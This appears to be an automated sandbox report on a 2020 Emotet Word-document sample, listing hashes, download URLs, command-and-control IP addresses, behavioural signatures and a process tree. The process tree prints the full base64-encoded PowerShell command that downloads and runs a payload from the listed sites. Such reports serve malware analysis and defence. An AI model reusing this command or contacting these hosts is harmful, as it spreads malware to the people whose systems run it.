Analysis
-
max time kernel
137s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
29-07-2020 00:13
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc
Resource
win7
General
-
Target
emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc
-
Size
169KB
-
MD5
0844a5ac279d31e0d7915770bdebe16e
-
SHA1
08febfb1becbf3d793ac8c61a7640d4f76f80f34
-
SHA256
815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1
-
SHA512
66fab8a4dc956cfb2fbd2b17758b3c7ab274e638403124603b7dfef9c59dbff9aed91d8c4f81c3d31a2c8a3eedead4ed16af81695fc2e2bb16dea8c43fbe8565
Malware Config
Extracted
https://mossfs.com.au/wp-content/fVrTuWOb/
https://rtisistemas.com.br/jdetsob/Ov3a8106w4g7x17030547/
http://slbqms.co.ls/cgi-bin/CHrsuXU/
http://sertcom.net/_vti_bin/LiUoBmTHW/
http://skpsoft.com/wp-admin/YnsFh/
Extracted
emotet
177.37.81.212:443
74.207.230.187:8080
190.164.75.175:80
87.252.100.28:80
105.209.239.55:80
163.172.107.70:8080
37.208.106.146:8080
24.157.25.203:80
212.112.113.235:80
140.207.113.106:443
75.139.38.211:80
192.210.217.94:8080
46.49.124.53:80
75.127.14.170:8080
87.106.231.60:8080
139.59.12.63:8080
181.167.35.84:80
201.214.108.231:80
74.208.173.91:8080
189.146.1.78:443
212.156.133.218:80
37.70.131.107:80
181.113.229.139:443
144.139.91.187:80
50.116.78.109:8080
46.32.229.152:8080
80.211.32.88:8080
157.7.164.178:8081
113.161.148.81:80
37.46.129.215:8080
216.75.37.196:8080
78.188.170.128:80
192.241.220.183:8080
77.74.78.80:443
81.214.253.80:443
45.118.136.92:8080
113.160.180.109:80
143.95.101.72:8080
181.143.101.19:8080
190.111.215.4:8080
192.163.221.191:8080
203.153.216.182:7080
46.105.131.68:8080
177.144.130.105:443
51.38.201.19:7080
190.55.233.156:80
181.134.9.162:80
178.33.167.120:8080
41.185.29.128:8080
78.189.111.208:443
181.164.110.7:80
203.153.216.178:7080
115.79.195.246:80
195.201.56.70:8080
179.5.118.12:80
185.142.236.163:443
91.83.93.103:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 500 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powersheLL.exeopenfiles.exepid process 2044 powersheLL.exe 2044 powersheLL.exe 2044 powersheLL.exe 3320 openfiles.exe 3320 openfiles.exe 3320 openfiles.exe 3320 openfiles.exe 3320 openfiles.exe 3320 openfiles.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
49.exedescription pid process target process PID 3860 wrote to memory of 3320 3860 49.exe openfiles.exe PID 3860 wrote to memory of 3320 3860 49.exe openfiles.exe PID 3860 wrote to memory of 3320 3860 49.exe openfiles.exe -
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/3860-8-0x0000000000650000-0x000000000065C000-memory.dmp emotet behavioral2/memory/3320-11-0x00000000005A0000-0x00000000005AC000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
WINWORD.EXE49.exeopenfiles.exepid process 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3952 WINWORD.EXE 3860 49.exe 3860 49.exe 3320 openfiles.exe 3320 openfiles.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3952 WINWORD.EXE 3952 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 2044 powersheLL.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 14 2044 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
49.exeopenfiles.exepid process 3860 49.exe 3320 openfiles.exe -
Drops file in System32 directory 1 IoCs
Processes:
49.exedescription ioc process File opened for modification C:\Windows\SysWOW64\CastingShellExt\openfiles.exe 49.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABZAFEAUABBAE8AYQBzAHIAPQAnAFkARABOAFIATQByAGoAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AFIAYABpAFQAWQBwAFIAYABPAFQATwBgAEMAYABvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABEAEIAQQBKAEcAawBtAGUAIAA9ACAAJwA0ADkAJwA7ACQATgBGAEQASQBNAGQAaABjAD0AJwBQAEEARQBIAFQAbABwAGMAJwA7ACQAVwBSAFkAUwBZAHMAeABpAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABEAEIAQQBKAEcAawBtAGUAKwAnAC4AZQB4AGUAJwA7ACQAVwBDAFkAQQBHAHkAeQBlAD0AJwBNAFAASgBaAEQAagBiAHIAJwA7ACQAWABLAEQAQQBLAGIAegBzAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABJAEUATgB0ADsAJABHAEQAVwBHAFUAZwBsAGQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAG8AcwBzAGYAcwAuAGMAbwBtAC4AYQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAVgByAFQAdQBXAE8AYgAvACoAaAB0AHQAcABzADoALwAvAHIAdABpAHMAaQBzAHQAZQBtAGEAcwAuAGMAbwBtAC4AYgByAC8AagBkAGUAdABzAG8AYgAvAE8AdgAzAGEAOAAxADAANgB3ADQAZwA3AHgAMQA3ADAAMwAwADUANAA3AC8AKgBoAHQAdABwADoALwAvAHMAbABiAHEAbQBzAC4AYwBvAC4AbABzAC8AYwBnAGkALQBiAGkAbgAvAEMASAByAHMAdQBYAFUALwAqAGgAdAB0AHAAOgAvAC8AcwBlAHIAdABjAG8AbQAuAG4AZQB0AC8AXwB2AHQAaQBfAGIAaQBuAC8ATABpAFUAbwBCAG0AVABIAFcALwAqAGgAdAB0AHAAOgAvAC8AcwBrAHAAcwBvAGYAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AWQBuAHMARgBoAC8AJwAuACIAcwBwAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABVAEgARABXAEcAeQBtAGMAPQAnAFUAVgBVAEcAWABvAGgAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBHAE8AVQBYAG0AbgB0ACAAaQBuACAAJABHAEQAVwBHAFUAZwBsAGQAKQB7AHQAcgB5AHsAJABYAEsARABBAEsAYgB6AHMALgAiAGQAYABvAFcATgBsAG8AYABBAGAARABGAGkAbABlACIAKAAkAFkARwBPAFUAWABtAG4AdAAsACAAJABXAFIAWQBTAFkAcwB4AGkAKQA7ACQATQBOAFkARgBLAGgAbgB2AD0AJwBYAFAAVwBVAEYAYgBxAHUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAFIAWQBTAFkAcwB4AGkAKQAuACIATABlAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADUAOQA1ADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGUAYQB0AGUAIgAoACQAVwBSAFkAUwBZAHMAeABpACkAOwAkAFoAVgBaAE8ARQBlAGUAaQA9ACcARwBSAFUAUwBYAGsAcABkACcAOwBiAHIAZQBhAGsAOwAkAFAAWABWAEoATABrAG8AbgA9ACcAWgBQAFMAUABEAHQAaQBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AWgBVAEEARwB5AHIAcAA9ACcAQwBXAFoASwBRAHgAdABlACcA1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
-
C:\Users\Admin\49.exeC:\Users\Admin\49.exe1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\CastingShellExt\openfiles.exe"C:\Windows\SysWOW64\CastingShellExt\openfiles.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\49.exe
-
C:\Users\Admin\49.exe
-
C:\Windows\SysWOW64\CastingShellExt\openfiles.exe
-
memory/3320-9-0x0000000000000000-mapping.dmp
-
memory/3320-11-0x00000000005A0000-0x00000000005AC000-memory.dmpFilesize
48KB
-
memory/3860-8-0x0000000000650000-0x000000000065C000-memory.dmpFilesize
48KB
-
memory/3952-1-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmpFilesize
68KB
-
memory/3952-2-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmpFilesize
68KB
-
memory/3952-3-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmpFilesize
68KB